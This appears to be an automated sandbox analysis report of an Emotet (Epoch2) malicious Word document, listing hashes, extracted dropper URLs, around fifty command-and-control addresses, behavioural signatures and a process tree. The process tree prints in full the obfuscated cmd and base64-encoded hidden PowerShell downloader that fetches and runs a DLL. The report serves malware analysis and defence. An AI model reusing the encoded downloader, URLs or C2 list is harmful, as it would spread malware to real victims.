d297c0a4c89de58051ca734994c514d423a71d1a0fcad5c1da9a76f402bd3bbe

General
Target

d297c0a4c89de58051ca734994c514d423a71d1a0fcad5c1da9a76f402bd3bbe.doc

Filesize

164KB

Completed

11-02-2021 19:54

Score
10/10
MD5

02b2dee96e10003270606dfd7e059d23

SHA1

defe94b8ae07e6c5db6942bc7d020b615c4ba75d

SHA256

d297c0a4c89de58051ca734994c514d423a71d1a0fcad5c1da9a76f402bd3bbe

Malware Config

Extracted

Language ps1
Deobfuscated
URLs
exe.dropper

http://www.achutamanasa.com/media/Te/

exe.dropper

http://opticaquilin.cl/wp-includes/FFueL/

exe.dropper

https://www.infoquick.co.uk/assets/h/

exe.dropper

http://vilajansen.com.br/loja_old_1/p/

exe.dropper

http://oftalmovilaplana.com/wp-includes/wfKu/

exe.dropper

https://cashyinvestment.org/wp-content/21dIZ/

exe.dropper

http://merkadito.mx/upload/6/

Extracted

Family emotet
Botnet Epoch2
C2

12.175.220.98:80

162.241.204.233:8080

50.116.111.59:8080

172.86.188.251:8080

139.99.158.11:443

66.57.108.14:443

75.177.207.146:80

194.190.67.75:80

50.245.107.73:443

173.70.61.180:80

85.105.205.77:8080

104.131.11.150:443

62.75.141.82:80

70.92.118.112:80

194.4.58.192:7080

120.150.60.189:80

24.231.88.85:80

78.24.219.147:8080

110.142.236.207:80

119.59.116.21:8080

144.217.7.207:7080

95.213.236.64:8080

46.105.131.79:8080

176.111.60.55:8080

174.118.202.24:443

94.23.237.171:443

138.68.87.218:443

110.145.101.66:443

134.209.144.106:443

74.208.45.104:8080

24.178.90.49:80

172.125.40.123:80

157.245.99.39:8080

118.83.154.64:443

202.134.4.211:8080

121.124.124.40:7080

172.104.97.173:8080

110.145.11.73:80

172.105.13.66:443

168.235.67.138:7080

78.188.225.105:80

59.21.235.119:80

185.94.252.104:443

24.179.13.119:80

49.205.182.134:80

51.89.36.180:443

115.21.224.117:80

202.134.4.216:8080

190.251.200.206:80

78.189.148.42:80

rsa_pubkey.plain
Signatures 14

Filter: none

Defense Evasion
Discovery
  • Emotet

    Description

    Emotet is a trojan that is primarily spread through spam emails.

  • Process spawned unexpected child process
    cmd.exe

    Description

    This typically indicates the parent process was compromised via an exploit or macro.

    Reported IOCs

    descriptionpidpid_targetprocesstarget process
    Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process9161736cmd.exe
  • Blocklisted process makes network request
    powershell.exerundll32.exe

    Reported IOCs

    flowpidprocess
    6532powershell.exe
    8532powershell.exe
    10532powershell.exe
    12532powershell.exe
    14532powershell.exe
    16532powershell.exe
    18532powershell.exe
    20532powershell.exe
    22992rundll32.exe
    25992rundll32.exe
    26992rundll32.exe
    27992rundll32.exe
    30992rundll32.exe
  • Loads dropped DLL
    rundll32.exerundll32.exe

    Reported IOCs

    pidprocess
    1108rundll32.exe
    1108rundll32.exe
    1108rundll32.exe
    1108rundll32.exe
    664rundll32.exe
    664rundll32.exe
    664rundll32.exe
    664rundll32.exe
  • Drops file in System32 directory
    powershell.exerundll32.exe

    Reported IOCs

    descriptioniocprocess
    File opened for modificationC:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnkpowershell.exe
    File opened for modificationC:\Windows\SysWOW64\Froktyco\uyrmjsw.apzrundll32.exe
  • Enumerates physical storage devices

    Description

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

    TTPs

    System Information Discovery
  • Drops file in Windows directory
    WINWORD.EXE

    Reported IOCs

    descriptioniocprocess
    File opened for modificationC:\Windows\Debug\WIA\wiatrace.logWINWORD.EXE
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings
    WINWORD.EXE

    TTPs

    Modify Registry

    Reported IOCs

    descriptioniocprocess
    Key created\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\ToolbarWINWORD.EXE
    Key created\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNoteWINWORD.EXE
    Set value (str)\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"WINWORD.EXE
    Key created\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft ExcelWINWORD.EXE
    Set value (str)\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes"WINWORD.EXE
    Key created\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExtWINWORD.EXE
    Set value (int)\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55"WINWORD.EXE
    Set value (str)\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000"WINWORD.EXE
    Set value (int)\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1"WINWORD.EXE
  • Suspicious behavior: AddClipboardFormatListener
    WINWORD.EXE

    Reported IOCs

    pidprocess
    844WINWORD.EXE
  • Suspicious behavior: EnumeratesProcesses
    powershell.exerundll32.exe

    Reported IOCs

    pidprocess
    532powershell.exe
    532powershell.exe
    992rundll32.exe
    992rundll32.exe
    992rundll32.exe
    992rundll32.exe
  • Suspicious use of AdjustPrivilegeToken
    powershell.exe

    Reported IOCs

    descriptionpidprocess
    Token: SeDebugPrivilege532powershell.exe
  • Suspicious use of SetWindowsHookEx
    WINWORD.EXE

    Reported IOCs

    pidprocess
    844WINWORD.EXE
    844WINWORD.EXE
  • Suspicious use of WriteProcessMemory
    cmd.exepowershell.exerundll32.exerundll32.exerundll32.exerundll32.exe

    Reported IOCs

    descriptionpidprocesstarget process
    PID 916 wrote to memory of 696916cmd.exemsg.exe
    PID 916 wrote to memory of 696916cmd.exemsg.exe
    PID 916 wrote to memory of 696916cmd.exemsg.exe
    PID 916 wrote to memory of 532916cmd.exepowershell.exe
    PID 916 wrote to memory of 532916cmd.exepowershell.exe
    PID 916 wrote to memory of 532916cmd.exepowershell.exe
    PID 532 wrote to memory of 1128532powershell.exerundll32.exe
    PID 532 wrote to memory of 1128532powershell.exerundll32.exe
    PID 532 wrote to memory of 1128532powershell.exerundll32.exe
    PID 1128 wrote to memory of 11081128rundll32.exerundll32.exe
    PID 1128 wrote to memory of 11081128rundll32.exerundll32.exe
    PID 1128 wrote to memory of 11081128rundll32.exerundll32.exe
    PID 1128 wrote to memory of 11081128rundll32.exerundll32.exe
    PID 1128 wrote to memory of 11081128rundll32.exerundll32.exe
    PID 1128 wrote to memory of 11081128rundll32.exerundll32.exe
    PID 1128 wrote to memory of 11081128rundll32.exerundll32.exe
    PID 1108 wrote to memory of 6641108rundll32.exerundll32.exe
    PID 1108 wrote to memory of 6641108rundll32.exerundll32.exe
    PID 1108 wrote to memory of 6641108rundll32.exerundll32.exe
    PID 1108 wrote to memory of 6641108rundll32.exerundll32.exe
    PID 1108 wrote to memory of 6641108rundll32.exerundll32.exe
    PID 1108 wrote to memory of 6641108rundll32.exerundll32.exe
    PID 1108 wrote to memory of 6641108rundll32.exerundll32.exe
    PID 664 wrote to memory of 800664rundll32.exerundll32.exe
    PID 664 wrote to memory of 800664rundll32.exerundll32.exe
    PID 664 wrote to memory of 800664rundll32.exerundll32.exe
    PID 664 wrote to memory of 800664rundll32.exerundll32.exe
    PID 664 wrote to memory of 800664rundll32.exerundll32.exe
    PID 664 wrote to memory of 800664rundll32.exerundll32.exe
    PID 664 wrote to memory of 800664rundll32.exerundll32.exe
    PID 800 wrote to memory of 992800rundll32.exerundll32.exe
    PID 800 wrote to memory of 992800rundll32.exerundll32.exe
    PID 800 wrote to memory of 992800rundll32.exerundll32.exe
    PID 800 wrote to memory of 992800rundll32.exerundll32.exe
    PID 800 wrote to memory of 992800rundll32.exerundll32.exe
    PID 800 wrote to memory of 992800rundll32.exerundll32.exe
    PID 800 wrote to memory of 992800rundll32.exerundll32.exe
Processes 9
  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\d297c0a4c89de58051ca734994c514d423a71d1a0fcad5c1da9a76f402bd3bbe.doc"
    Drops file in Windows directory
    Modifies Internet Explorer settings
    Suspicious behavior: AddClipboardFormatListener
    Suspicious use of SetWindowsHookEx
    PID:844
  • C:\Windows\system32\cmd.exe
    cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IABzAHYAIAB0ADcAZQAgACAAKAAgAFsAVABZAFAARQBdACgAIgB7ADEAfQB7ADYAfQB7ADQAfQB7ADUAfQB7ADMAfQB7ADIAfQB7ADAAfQAiAC0ARgAnAHkAJwAsACcAcwAnACwAJwBSAEUAYwB0AG8AUgAnACwAJwBkAEkAJwAsACcARQBtAC4ASQBvACcALAAnAC4AJwAsACcAeQBTAHQAJwApACAAKQAgACAAOwAgACQAcgAwAG4AQwB3AE0AIAA9ACAAIABbAFQAWQBwAGUAXQAoACIAewAyAH0AewA1AH0AewA5AH0AewAzAH0AewAwAH0AewAxAH0AewA2AH0AewA3AH0AewA0AH0AewA4AH0AIgAtAEYAIAAnAHMAZQBSACcALAAnAHYASQBjAGUAJwAsACcAcwAnACwAJwBNAC4AbgBlAFQALgAnACwAJwBBAG4AQQBHAGUAJwAsACcAeQBzACcALAAnAHAAbwAnACwAJwBJAE4AVABNACcALAAnAHIAJwAsACcAVABlACcAKQAgADsAIAAkAEoAdQB5AHkAbwBwAHEAPQAkAFcAOAAxAEYAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAE4AMQA2AEkAOwAkAEQAMQAxAEsAPQAoACcARQAnACsAKAAnADIAJwArACcAMgBBACcAKQApADsAIAAkAFQANwBlADoAOgAiAGMAcgBFAGEAYABUAGAAZQBkAGAASQBSAGUAYwB0AGAATwBSAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAJwArACcAfQAnACsAJwBUACcAKwAnAGwAJwArACcANAAxAHAAdQB4AHsAMAB9ACcAKwAoACcAQgAnACsAJwBtAGQAXwAnACsAJwBwADUAZgAnACkAKwAnAHsAMAB9ACcAKQAgACAALQBmACAAIABbAGMASABBAHIAXQA5ADIAKQApADsAJABSADgANwBZAD0AKAAnAEQAJwArACgAJwA1ADkAJwArACcASAAnACkAKQA7ACAAKAAgACAAZwBFAFQALQB2AEEAUgBpAGEAYgBsAGUAIAAoACcAUgAwACcAKwAnAE4AQwB3AG0AJwApACAALQB2AGEAbAB1AEUAbwBuAGwAWQAgACkAOgA6ACIAUwBFAEMAVQBSAGAASQBgAFQAeQBwAGAAUgBvAFQAbwBDAE8ATAAiACAAPQAgACgAJwBUACcAKwAoACcAbAAnACsAJwBzADEAMgAnACkAKQA7ACQARwA2ADUAQgA9ACgAJwBUACcAKwAoACcANAAzACcAKwAnAEIAJwApACkAOwAkAE0AegB6AHQAZABvAGcAIAA9ACAAKAAnAEcAJwArACgAJwAzACcAKwAnADUARAAnACkAKQA7ACQAUQA2ADgAVgA9ACgAJwBYADQAJwArACcAOQBCACcAKQA7ACQAUQB1AHQANABwAHIAbwA9ACQASABPAE0ARQArACgAKAAnAEEASwAnACsAKAAnAGkAJwArACcAVABsADQAJwArACcAMQBwAHUAeABBAEsAJwApACsAJwBpACcAKwAnAEIAJwArACcAbQAnACsAKAAnAGQAXwAnACsAJwBwADUAJwApACsAKAAnAGYAQQAnACsAJwBLAGkAJwApACkALQBSAGUAUABMAEEAYwBFACAAIAAoACcAQQBLACcAKwAnAGkAJwApACwAWwBjAEgAQQBSAF0AOQAyACkAKwAkAE0AegB6AHQAZABvAGcAKwAoACgAJwAuAGQAJwArACcAbAAnACkAKwAnAGwAJwApADsAJABGADEAMgBFAD0AKAAnAEIANAAnACsAJwAzAEQAJwApADsAJABCAGoAeQB2ADcAYwBiAD0AKAAoACcAcwBnACAAJwArACcAeQAnACkAKwAoACcAdwAgAGEAJwArACcAaAAnACkAKwAnADoALwAnACsAKAAnAC8AdwAnACsAJwB3AHcAJwApACsAKAAnAC4AYQBjAGgAJwArACcAdQB0ACcAKQArACcAYQBtACcAKwAoACcAYQAnACsAJwBuAGEAcwBhACcAKQArACgAJwAuAGMAbwBtACcAKwAnAC8AJwApACsAKAAnAG0AZQBkAGkAJwArACcAYQAnACsAJwAvAFQAZQAvAEAAJwApACsAJwBzAGcAJwArACcAIAB5ACcAKwAoACcAdwAgAGEAaAAnACsAJwA6ACcAKQArACcALwAnACsAJwAvAG8AJwArACcAcAAnACsAJwB0ACcAKwAoACcAaQBjAGEAcQAnACsAJwB1ACcAKQArACgAJwBpAGwAaQBuAC4AJwArACcAYwBsACcAKQArACcALwAnACsAKAAnAHcAJwArACcAcAAtACcAKQArACcAaQBuACcAKwAnAGMAbAAnACsAKAAnAHUAJwArACcAZABlAHMALwAnACsAJwBGAEYAJwApACsAKAAnAHUAZQBMAC8AQAAnACsAJwBzAGcAIAAnACsAJwB5AHcAJwArACcAIAAnACkAKwAoACcAYQBoAHMAOgAnACsAJwAvACcAKQArACgAJwAvACcAKwAnAHcAdwB3ACcAKwAnAC4AaQAnACkAKwAnAG4AJwArACgAJwBmAG8AcQB1ACcAKwAnAGkAYwAnACsAJwBrAC4AYwBvAC4AJwApACsAKAAnAHUAJwArACcAawAvAGEAcwAnACkAKwAoACcAcwBlACcAKwAnAHQAJwArACcAcwAvAGgALwBAAHMAZwAnACkAKwAoACcAIAB5AHcAJwArACcAIAAnACkAKwAoACcAYQBoACcAKwAnADoALwAvAHYAJwApACsAJwBpACcAKwAoACcAbABhACcAKwAnAGoAYQBuACcAKwAnAHMAJwApACsAJwBlACcAKwAnAG4AJwArACgAJwAuACcAKwAnAGMAbwBtACcAKQArACcALgAnACsAKAAnAGIAJwArACcAcgAvACcAKwAnAGwAbwBqAGEAXwBvAGwAZAAnACkAKwAoACcAXwAxAC8AcAAnACsAJwAvACcAKwAnAEAAcwAnACsAJwBnACAAeQB3ACAAYQBoACcAKQArACgAJwA6AC8ALwAnACsAJwBvAGYAdABhACcAKwAnAGwAJwApACsAKAAnAG0AbwAnACsAJwB2ACcAKQArACgAJwBpAGwAJwArACcAYQBwACcAKwAnAGwAYQBuAGEALgAnACkAKwAnAGMAJwArACcAbwAnACsAKAAnAG0ALwAnACsAJwB3ACcAKQArACgAJwBwACcAKwAnAC0AaQBuAGMAJwApACsAKAAnAGwAJwArACcAdQBkACcAKQArACgAJwBlAHMAJwArACcALwAnACkAKwAoACcAdwBmACcAKwAnAEsAdQAnACkAKwAnAC8AJwArACcAQAAnACsAJwBzAGcAJwArACgAJwAgAHkAJwArACcAdwAgAGEAJwApACsAKAAnAGgAcwA6ACcAKwAnAC8AJwApACsAKAAnAC8AJwArACcAYwBhACcAKQArACcAcwBoACcAKwAoACcAeQAnACsAJwBpAG4AJwArACcAdgBlAHMAJwApACsAKAAnAHQAbQAnACsAJwBlACcAKQArACgAJwBuACcAKwAnAHQALgAnACkAKwAoACcAbwByAGcAJwArACcALwB3ACcAKQArACgAJwBwAC0AJwArACcAYwBvACcAKQArACgAJwBuAHQAJwArACcAZQBuACcAKQArACcAdAAvACcAKwAnADIAJwArACgAJwAxACcAKwAnAGQASQBaAC8AJwApACsAKAAnAEAAJwArACcAcwBnACAAJwApACsAKAAnAHkAdwAgACcAKwAnAGEAJwApACsAJwBoADoAJwArACcALwAvACcAKwAoACcAbQBlAHIAJwArACcAawBhAGQAJwArACcAaQB0AG8ALgAnACkAKwAoACcAbQAnACsAJwB4AC8AJwApACsAKAAnAHUAcAAnACsAJwBsACcAKQArACgAJwBvAGEAZAAnACsAJwAvADYAJwArACcALwAnACkAKQAuACIAcgBFAGAAUABMAGEAYwBlACIAKAAoACgAJwBzACcAKwAnAGcAIAAnACkAKwAoACcAeQB3ACAAJwArACcAYQBoACcAKQApACwAKABbAGEAcgByAGEAeQBdACgAKAAnAGQAcwAnACsAKAAnAGUAJwArACcAdwBmACcAKQApACwAKAAnAHcAZQAnACsAKAAnAHYAJwArACcAdwBlACcAKQApACkALAAoACcAYQBlACcAKwAnAGYAZgAnACkALAAoACcAaAB0ACcAKwAnAHQAcAAnACkAKQBbADIAXQApAC4AIgBTAFAAbABgAEkAVAAiACgAJABRADcAXwBQACAAKwAgACQASgB1AHkAeQBvAHAAcQAgACsAIAAkAFYAMAAxAFUAKQA7ACQASwAzADYATgA9ACgAKAAnAFEAOQAnACsAJwBfACcAKQArACcASgAnACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAFgAcgBfAHMAdgB6AGMAIABpAG4AIAAkAEIAagB5AHYANwBjAGIAKQB7AHQAcgB5AHsAKAAmACgAJwBOAGUAdwAnACsAJwAtAE8AYgBqAGUAYwAnACsAJwB0ACcAKQAgAHMAWQBTAFQAZQBNAC4ATgBlAHQALgBXAEUAQgBjAGwASQBFAE4AVAApAC4AIgBEAE8AdwBuAEwATwBgAEEARABGAGAAaQBMAEUAIgAoACQAWAByAF8AcwB2AHoAYwAsACAAJABRAHUAdAA0AHAAcgBvACkAOwAkAFkAOAA0AEQAPQAoACcAUgAzACcAKwAnADEAVgAnACkAOwBJAGYAIAAoACgALgAoACcARwBlAHQALQBJACcAKwAnAHQAZQAnACsAJwBtACcAKQAgACQAUQB1AHQANABwAHIAbwApAC4AIgBsAEUAYABOAEcAVABoACIAIAAtAGcAZQAgADMAMwA1ADAAMQApACAAewAmACgAJwByAHUAbgBkAGwAbAAnACsAJwAzADIAJwApACAAJABRAHUAdAA0AHAAcgBvACwAKAAoACcAQQBuAHkAUwAnACsAJwB0ACcAKQArACcAcgBpACcAKwAnAG4AZwAnACkALgAiAHQAYABPAHMAVAByAGAASQBuAGcAIgAoACkAOwAkAEEANAAxAFUAPQAoACgAJwBOADEAJwArACcAMQAnACkAKwAnAEMAJwApADsAYgByAGUAYQBrADsAJABIADEAMwBNAD0AKAAnAFAANwAnACsAJwA5AFAAJwApAH0AfQBjAGEAdABjAGgAewB9AH0AJABLADAAMABDAD0AKAAoACcASAAwACcAKwAnAF8AJwApACsAJwBDACcAKQA=
    Process spawned unexpected child process
    Suspicious use of WriteProcessMemory
    PID:916
    • C:\Windows\system32\msg.exe
      msg Admin /v Word experienced an error trying to open the file.
      PID:696
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -w hidden -enc IABzAHYAIAB0ADcAZQAgACAAKAAgAFsAVABZAFAARQBdACgAIgB7ADEAfQB7ADYAfQB7ADQAfQB7ADUAfQB7ADMAfQB7ADIAfQB7ADAAfQAiAC0ARgAnAHkAJwAsACcAcwAnACwAJwBSAEUAYwB0AG8AUgAnACwAJwBkAEkAJwAsACcARQBtAC4ASQBvACcALAAnAC4AJwAsACcAeQBTAHQAJwApACAAKQAgACAAOwAgACQAcgAwAG4AQwB3AE0AIAA9ACAAIABbAFQAWQBwAGUAXQAoACIAewAyAH0AewA1AH0AewA5AH0AewAzAH0AewAwAH0AewAxAH0AewA2AH0AewA3AH0AewA0AH0AewA4AH0AIgAtAEYAIAAnAHMAZQBSACcALAAnAHYASQBjAGUAJwAsACcAcwAnACwAJwBNAC4AbgBlAFQALgAnACwAJwBBAG4AQQBHAGUAJwAsACcAeQBzACcALAAnAHAAbwAnACwAJwBJAE4AVABNACcALAAnAHIAJwAsACcAVABlACcAKQAgADsAIAAkAEoAdQB5AHkAbwBwAHEAPQAkAFcAOAAxAEYAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAE4AMQA2AEkAOwAkAEQAMQAxAEsAPQAoACcARQAnACsAKAAnADIAJwArACcAMgBBACcAKQApADsAIAAkAFQANwBlADoAOgAiAGMAcgBFAGEAYABUAGAAZQBkAGAASQBSAGUAYwB0AGAATwBSAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAJwArACcAfQAnACsAJwBUACcAKwAnAGwAJwArACcANAAxAHAAdQB4AHsAMAB9ACcAKwAoACcAQgAnACsAJwBtAGQAXwAnACsAJwBwADUAZgAnACkAKwAnAHsAMAB9ACcAKQAgACAALQBmACAAIABbAGMASABBAHIAXQA5ADIAKQApADsAJABSADgANwBZAD0AKAAnAEQAJwArACgAJwA1ADkAJwArACcASAAnACkAKQA7ACAAKAAgACAAZwBFAFQALQB2AEEAUgBpAGEAYgBsAGUAIAAoACcAUgAwACcAKwAnAE4AQwB3AG0AJwApACAALQB2AGEAbAB1AEUAbwBuAGwAWQAgACkAOgA6ACIAUwBFAEMAVQBSAGAASQBgAFQAeQBwAGAAUgBvAFQAbwBDAE8ATAAiACAAPQAgACgAJwBUACcAKwAoACcAbAAnACsAJwBzADEAMgAnACkAKQA7ACQARwA2ADUAQgA9ACgAJwBUACcAKwAoACcANAAzACcAKwAnAEIAJwApACkAOwAkAE0AegB6AHQAZABvAGcAIAA9ACAAKAAnAEcAJwArACgAJwAzACcAKwAnADUARAAnACkAKQA7ACQAUQA2ADgAVgA9ACgAJwBYADQAJwArACcAOQBCACcAKQA7ACQAUQB1AHQANABwAHIAbwA9ACQASABPAE0ARQArACgAKAAnAEEASwAnACsAKAAnAGkAJwArACcAVABsADQAJwArACcAMQBwAHUAeABBAEsAJwApACsAJwBpACcAKwAnAEIAJwArACcAbQAnACsAKAAnAGQAXwAnACsAJwBwADUAJwApACsAKAAnAGYAQQAnACsAJwBLAGkAJwApACkALQBSAGUAUABMAEEAYwBFACAAIAAoACcAQQBLACcAKwAnAGkAJwApACwAWwBjAEgAQQBSAF0AOQAyACkAKwAkAE0AegB6AHQAZABvAGcAKwAoACgAJwAuAGQAJwArACcAbAAnACkAKwAnAGwAJwApADsAJABGADEAMgBFAD0AKAAnAEIANAAnACsAJwAzAEQAJwApADsAJABCAGoAeQB2ADcAYwBiAD0AKAAoACcAcwBnACAAJwArACcAeQAnACkAKwAoACcAdwAgAGEAJwArACcAaAAnACkAKwAnADoALwAnACsAKAAnAC8AdwAnACsAJwB3AHcAJwApACsAKAAnAC4AYQBjAGgAJwArACcAdQB0ACcAKQArACcAYQBtACcAKwAoACcAYQAnACsAJwBuAGEAcwBhACcAKQArACgAJwAuAGMAbwBtACcAKwAnAC8AJwApACsAKAAnAG0AZQBkAGkAJwArACcAYQAnACsAJwAvAFQAZQAvAEAAJwApACsAJwBzAGcAJwArACcAIAB5ACcAKwAoACcAdwAgAGEAaAAnACsAJwA6ACcAKQArACcALwAnACsAJwAvAG8AJwArACcAcAAnACsAJwB0ACcAKwAoACcAaQBjAGEAcQAnACsAJwB1ACcAKQArACgAJwBpAGwAaQBuAC4AJwArACcAYwBsACcAKQArACcALwAnACsAKAAnAHcAJwArACcAcAAtACcAKQArACcAaQBuACcAKwAnAGMAbAAnACsAKAAnAHUAJwArACcAZABlAHMALwAnACsAJwBGAEYAJwApACsAKAAnAHUAZQBMAC8AQAAnACsAJwBzAGcAIAAnACsAJwB5AHcAJwArACcAIAAnACkAKwAoACcAYQBoAHMAOgAnACsAJwAvACcAKQArACgAJwAvACcAKwAnAHcAdwB3ACcAKwAnAC4AaQAnACkAKwAnAG4AJwArACgAJwBmAG8AcQB1ACcAKwAnAGkAYwAnACsAJwBrAC4AYwBvAC4AJwApACsAKAAnAHUAJwArACcAawAvAGEAcwAnACkAKwAoACcAcwBlACcAKwAnAHQAJwArACcAcwAvAGgALwBAAHMAZwAnACkAKwAoACcAIAB5AHcAJwArACcAIAAnACkAKwAoACcAYQBoACcAKwAnADoALwAvAHYAJwApACsAJwBpACcAKwAoACcAbABhACcAKwAnAGoAYQBuACcAKwAnAHMAJwApACsAJwBlACcAKwAnAG4AJwArACgAJwAuACcAKwAnAGMAbwBtACcAKQArACcALgAnACsAKAAnAGIAJwArACcAcgAvACcAKwAnAGwAbwBqAGEAXwBvAGwAZAAnACkAKwAoACcAXwAxAC8AcAAnACsAJwAvACcAKwAnAEAAcwAnACsAJwBnACAAeQB3ACAAYQBoACcAKQArACgAJwA6AC8ALwAnACsAJwBvAGYAdABhACcAKwAnAGwAJwApACsAKAAnAG0AbwAnACsAJwB2ACcAKQArACgAJwBpAGwAJwArACcAYQBwACcAKwAnAGwAYQBuAGEALgAnACkAKwAnAGMAJwArACcAbwAnACsAKAAnAG0ALwAnACsAJwB3ACcAKQArACgAJwBwACcAKwAnAC0AaQBuAGMAJwApACsAKAAnAGwAJwArACcAdQBkACcAKQArACgAJwBlAHMAJwArACcALwAnACkAKwAoACcAdwBmACcAKwAnAEsAdQAnACkAKwAnAC8AJwArACcAQAAnACsAJwBzAGcAJwArACgAJwAgAHkAJwArACcAdwAgAGEAJwApACsAKAAnAGgAcwA6ACcAKwAnAC8AJwApACsAKAAnAC8AJwArACcAYwBhACcAKQArACcAcwBoACcAKwAoACcAeQAnACsAJwBpAG4AJwArACcAdgBlAHMAJwApACsAKAAnAHQAbQAnACsAJwBlACcAKQArACgAJwBuACcAKwAnAHQALgAnACkAKwAoACcAbwByAGcAJwArACcALwB3ACcAKQArACgAJwBwAC0AJwArACcAYwBvACcAKQArACgAJwBuAHQAJwArACcAZQBuACcAKQArACcAdAAvACcAKwAnADIAJwArACgAJwAxACcAKwAnAGQASQBaAC8AJwApACsAKAAnAEAAJwArACcAcwBnACAAJwApACsAKAAnAHkAdwAgACcAKwAnAGEAJwApACsAJwBoADoAJwArACcALwAvACcAKwAoACcAbQBlAHIAJwArACcAawBhAGQAJwArACcAaQB0AG8ALgAnACkAKwAoACcAbQAnACsAJwB4AC8AJwApACsAKAAnAHUAcAAnACsAJwBsACcAKQArACgAJwBvAGEAZAAnACsAJwAvADYAJwArACcALwAnACkAKQAuACIAcgBFAGAAUABMAGEAYwBlACIAKAAoACgAJwBzACcAKwAnAGcAIAAnACkAKwAoACcAeQB3ACAAJwArACcAYQBoACcAKQApACwAKABbAGEAcgByAGEAeQBdACgAKAAnAGQAcwAnACsAKAAnAGUAJwArACcAdwBmACcAKQApACwAKAAnAHcAZQAnACsAKAAnAHYAJwArACcAdwBlACcAKQApACkALAAoACcAYQBlACcAKwAnAGYAZgAnACkALAAoACcAaAB0ACcAKwAnAHQAcAAnACkAKQBbADIAXQApAC4AIgBTAFAAbABgAEkAVAAiACgAJABRADcAXwBQACAAKwAgACQASgB1AHkAeQBvAHAAcQAgACsAIAAkAFYAMAAxAFUAKQA7ACQASwAzADYATgA9ACgAKAAnAFEAOQAnACsAJwBfACcAKQArACcASgAnACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAFgAcgBfAHMAdgB6AGMAIABpAG4AIAAkAEIAagB5AHYANwBjAGIAKQB7AHQAcgB5AHsAKAAmACgAJwBOAGUAdwAnACsAJwAtAE8AYgBqAGUAYwAnACsAJwB0ACcAKQAgAHMAWQBTAFQAZQBNAC4ATgBlAHQALgBXAEUAQgBjAGwASQBFAE4AVAApAC4AIgBEAE8AdwBuAEwATwBgAEEARABGAGAAaQBMAEUAIgAoACQAWAByAF8AcwB2AHoAYwAsACAAJABRAHUAdAA0AHAAcgBvACkAOwAkAFkAOAA0AEQAPQAoACcAUgAzACcAKwAnADEAVgAnACkAOwBJAGYAIAAoACgALgAoACcARwBlAHQALQBJACcAKwAnAHQAZQAnACsAJwBtACcAKQAgACQAUQB1AHQANABwAHIAbwApAC4AIgBsAEUAYABOAEcAVABoACIAIAAtAGcAZQAgADMAMwA1ADAAMQApACAAewAmACgAJwByAHUAbgBkAGwAbAAnACsAJwAzADIAJwApACAAJABRAHUAdAA0AHAAcgBvACwAKAAoACcAQQBuAHkAUwAnACsAJwB0ACcAKQArACcAcgBpACcAKwAnAG4AZwAnACkALgAiAHQAYABPAHMAVAByAGAASQBuAGcAIgAoACkAOwAkAEEANAAxAFUAPQAoACgAJwBOADEAJwArACcAMQAnACkAKwAnAEMAJwApADsAYgByAGUAYQBrADsAJABIADEAMwBNAD0AKAAnAFAANwAnACsAJwA5AFAAJwApAH0AfQBjAGEAdABjAGgAewB9AH0AJABLADAAMABDAD0AKAAoACcASAAwACcAKwAnAF8AJwApACsAJwBDACcAKQA=
      Blocklisted process makes network request
      Drops file in System32 directory
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:532
      • C:\Windows\system32\rundll32.exe
        "C:\Windows\system32\rundll32.exe" C:\Users\Admin\Tl41pux\Bmd_p5f\G35D.dll AnyString
        Suspicious use of WriteProcessMemory
        PID:1128
        • C:\Windows\SysWOW64\rundll32.exe
          "C:\Windows\system32\rundll32.exe" C:\Users\Admin\Tl41pux\Bmd_p5f\G35D.dll AnyString
          Loads dropped DLL
          Suspicious use of WriteProcessMemory
          PID:1108
          • C:\Windows\SysWOW64\rundll32.exe
            C:\Windows\SysWOW64\rundll32.exe "C:\Users\Admin\Tl41pux\Bmd_p5f\G35D.dll",#1
            Loads dropped DLL
            Drops file in System32 directory
            Suspicious use of WriteProcessMemory
            PID:664
            • C:\Windows\SysWOW64\rundll32.exe
